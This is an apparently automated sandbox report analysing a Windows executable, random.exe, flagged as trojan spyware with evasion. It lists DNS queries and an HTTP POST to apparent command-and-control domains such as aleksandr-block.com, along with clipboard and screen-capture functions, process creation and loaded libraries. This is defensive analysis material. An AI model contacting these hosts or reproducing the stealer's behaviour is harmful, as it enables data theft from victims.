        Source: global trafficDNS traffic detected: DNS query: spookycappy.biz
        Source: global trafficDNS traffic detected: DNS query: truculengisau.biz
        Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
        Source: global trafficDNS traffic detected: DNS query: aleksandr-block.com
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aleksandr-block.com
        Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
        Source: random.exe, 00000003.00000002.2243648609.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000003.00000002.2243730204.0000000000E33000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000003.00000002.2244277691.00000000035C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/
        Source: random.exe, 00000003.00000002.2243648609.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/6
        Source: random.exe, 00000003.00000002.2243730204.0000000000E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/6C
        Source: random.exe, 00000003.00000002.2244298987.00000000035D5000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000003.00000002.2243748450.0000000000E38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/api
        Source: random.exe, 00000003.00000002.2243730204.0000000000E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com/pie
        Source: random.exe, 00000003.00000002.2243648609.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aleksandr-block.com:443/apicrosoft
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49717 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49719 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49742 version: TLS 1.2
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004363E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_004363E0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004363E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_004363E0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00436590 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,3_2_00436590
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004204403_2_00420440
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004104463_2_00410446
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004424603_2_00442460
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0040D6903_2_0040D690
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004087403_2_00408740
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043B7B03_2_0043B7B0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004159753_2_00415975
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00427A503_2_00427A50
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00440A0D3_2_00440A0D
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00442DE03_2_00442DE0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00423E443_2_00423E44
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0040AE603_2_0040AE60
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0042DEE53_2_0042DEE5
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004300503_2_00430050
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004110783_2_00411078
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004270D03_2_004270D0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004361403_2_00436140
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043912C3_2_0043912C
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004091C03_2_004091C0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004161DF3_2_004161DF
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004311E63_2_004311E6
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004321883_2_00432188
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004061903_2_00406190
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0042F1953_2_0042F195
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004421B03_2_004421B0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0041E2503_2_0041E250
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0041B2003_2_0041B200
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004042D03_2_004042D0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004082A03_2_004082A0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004412B13_2_004412B1
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0041C3703_2_0041C370
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004273A03_2_004273A0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004174513_2_00417451
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004194703_2_00419470
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004074003_2_00407400
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043C4103_2_0043C410
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0040E4B03_2_0040E4B0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0041A5743_2_0041A574
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004245C03_2_004245C0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004165EE3_2_004165EE
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004155903_2_00415590
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004095A03_2_004095A0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004066203_2_00406620
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004186903_2_00418690
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043974A3_2_0043974A
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004197103_2_00419710
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0041F7103_2_0041F710
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0041C7D03_2_0041C7D0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004427E03_2_004427E0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0042A8103_2_0042A810
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004338103_2_00433810
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004058E03_2_004058E0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0042D8933_2_0042D893
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004148B03_2_004148B0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004288BA3_2_004288BA
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0040A9103_2_0040A910
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004419103_2_00441910
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004039203_2_00403920
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00441A563_2_00441A56
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0041BAD03_2_0041BAD0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00433AD03_2_00433AD0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00431A883_2_00431A88
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00441A943_2_00441A94
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0041AA903_2_0041AA90
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00442A903_2_00442A90
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0041CAA03_2_0041CAA0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043CAA73_2_0043CAA7
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00441B403_2_00441B40
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00420B103_2_00420B10
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00402B203_2_00402B20
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00411B203_2_00411B20
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0042ABC03_2_0042ABC0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00441BD03_2_00441BD0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043AC403_2_0043AC40
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00441C603_2_00441C60
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00404C003_2_00404C00
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0042ECD03_2_0042ECD0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00439CD83_2_00439CD8
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00440CD83_2_00440CD8
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00414C9C3_2_00414C9C
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0042CCA03_2_0042CCA0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00426D703_2_00426D70
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00428D763_2_00428D76
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00422D173_2_00422D17
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00405DC03_2_00405DC0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00415E423_2_00415E42
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00413E503_2_00413E50
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0041BE003_2_0041BE00
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00402EF03_2_00402EF0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043EE803_2_0043EE80
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043AEA03_2_0043AEA0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00427F8D3_2_00427F8D
        Source: C:\Users\user\Desktop\random.exeCode function: String function: 00413E40 appears 128 times
        Source: C:\Users\user\Desktop\random.exeCode function: String function: 00407F90 appears 52 times
        Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 916
        Source: random.exe, 00000000.00000000.2074779340.00000000003D8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamerasdlui.exej% vs random.exe
        Source: random.exe, 00000000.00000002.2224868156.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs random.exe
        Source: random.exe, 00000000.00000002.2225328258.00000000036E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerasdlui.exej% vs random.exe
        Source: random.exeBinary or memory string: OriginalFilenamerasdlui.exej% vs random.exe
        Source: random.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: random.exeStatic PE information: Section: .bss ZLIB complexity 1.0003307208466454
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/5@11/2
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043B7B0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_0043B7B0
        Source: C:\Users\user\Desktop\random.exeMutant created: NULL
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5560
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6188:120:WilError_03
        Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\c50bea17-0a59-4bb6-91b2-a839a532df8aJump to behavior
        Source: random.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: random.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: random.exeVirustotal: Detection: 68%
        Source: random.exeReversingLabs: Detection: 71%
        Source: C:\Users\user\Desktop\random.exeFile read: C:\Users\user\Desktop\random.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
        Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\random.exeProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
        Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 916
        Source: C:\Users\user\Desktop\random.exeProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"Jump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: random.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: System.Windows.Forms.pdb source: WERF6A.tmp.dmp.6.dr
        Source: Binary string: mscorlib.pdb` source: WERF6A.tmp.dmp.6.dr
        Source: Binary string: mscorlib.pdb source: WERF6A.tmp.dmp.6.dr
        Source: Binary string: System.ni.pdbRSDS source: WERF6A.tmp.dmp.6.dr
        Source: Binary string: System.Windows.Forms.pdbMZ@ source: WERF6A.tmp.dmp.6.dr
        Source: Binary string: Akim1er.pdb source: random.exe, WERF6A.tmp.dmp.6.dr
        Source: Binary string: mscorlib.ni.pdb source: WERF6A.tmp.dmp.6.dr
        Source: Binary string: System.pdbL0 source: WERF6A.tmp.dmp.6.dr
        Source: Binary string: mscorlib.ni.pdbRSDS source: WERF6A.tmp.dmp.6.dr
        Source: Binary string: System.ni.pdb source: WERF6A.tmp.dmp.6.dr
        Source: Binary string: System.pdb source: WERF6A.tmp.dmp.6.dr
        Source: random.exeStatic PE information: 0x8ED8AEEC [Mon Dec 11 00:33:48 2045 UTC]
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043A6F5 push esi; retf 3_2_0043A6FE
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00441860 push eax; mov dword ptr [esp], 424D4C7Fh3_2_00441864
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00445A1B push ecx; retf 3_2_00445A1C
        Source: C:\Users\user\Desktop\random.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\user\Desktop\random.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

